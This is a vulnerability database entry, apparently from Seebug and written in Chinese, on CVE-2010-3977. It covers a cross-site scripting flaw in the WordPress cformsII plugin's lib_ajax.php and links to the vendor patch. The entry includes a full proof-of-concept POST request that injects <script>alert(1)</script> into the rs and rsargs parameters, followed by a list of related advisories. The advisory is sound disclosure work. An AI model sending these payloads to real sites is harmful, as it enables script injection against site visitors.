Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:20225
HistoryNov 03, 2010 - 12:00 a.m.

WordPress cformsII插件rs和rsargs参数脚本注入漏洞

2010-11-0300:00:00
Root
www.seebug.org
21

0.004 Low

EPSS

Percentile

71.4%

JSON

BUGTRAQ ID: 44587
CVE ID: CVE-2010-3977

WordPress是一款免费的论坛Blog系统。

WordPress所使用的cformsII插件没有正确的过滤用户提交给wp-content/plugins/cforms /lib_ajax.php页面的rs和rsargs参数便显示给了用户。攻击者可以通过提交恶意的POST请求来利用这个漏洞,当用户查看生成页面时就会导致执行所注入的代码。

Nicole Stich cformsII 11.5
厂商补丁:

Nicole Stich

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.deliciousdays.com/cforms-plugin/


                                                Request:

http://<server>/wp-content/plugins/cforms/lib_ajax.php

POST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1

Host: <server>

User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:

1.9.2.10) Gecko/20100914 Firefox/3.6.10

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 115

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Content-Length: 219

Cookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do

%26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce

%26imgsize%3Dfull%26align%3Dcenter%26hidetb%3D1%26m9%3Dc%26m10%3Do

%26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765;

c o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f 8 0 2 0 5 8 e 8 2 3 8 8 f 6 = t e s t  ;

comment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam

%40checkpoint.com

Pragma: no-cache

Cache-Control: no-cache

rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#

$<script>alert(1)</script>$#[email protected]$#$http://

www.checkpoint.com$#$<script>alert(1)</script>

Related

prion 1
nessus 1
patchstack 1
packetstorm 1
securityvulns 2
jvn 1
checkpoint_advisories 1
wpvulndb 1
cve 1
openvas 1
prion
prion
Cross site scripting
2010-11-03 13:37:00
nessus
nessus
cformsII Plugin for WordPress 'rs' Parameter XSS
2010-11-08 00:00:00
patchstack
patchstack
WordPress CformsII Plugin 11.5 / 13.1 - Multiple Cross-Site Scripting Vulnerabilities
2010-11-01 00:00:00
packetstorm
packetstorm
cforms WordPress Plugin Cross Site Scripting
2010-11-02 00:00:00
securityvulns
securityvulns
cforms WordPress Plugin Cross Site Scripting Vulnerability - CVE-2010-3977
2010-11-02 00:00:00
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
2010-11-02 00:00:00
jvn
jvn
JVN#35256978: cforms II vulnerable to cross-site scripting
2012-02-15 00:00:00
checkpoint_advisories
checkpoint_advisories
Preemptive Protection against WordPress cforms Plugin Cross-Site Scripting (XSS) Vulnerability
2010-11-14 00:00:00
wpvulndb
wpvulndb
Cforms <= 13.1 - 'lib_ajax.php' Cross-Site Scripting (XSS)
2010-11-01 00:00:00
cve
cve
CVE-2010-3977
2010-11-03 13:37:00
openvas
openvas
WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities
2010-11-16 00:00:00

0.004 Low

EPSS

Percentile

71.4%

JSON
Related for SSV:20225
prion1nessus1patchstack1packetstorm1securityvulns2jvn1checkpoint_advisories1wpvulndb1cve1openvas1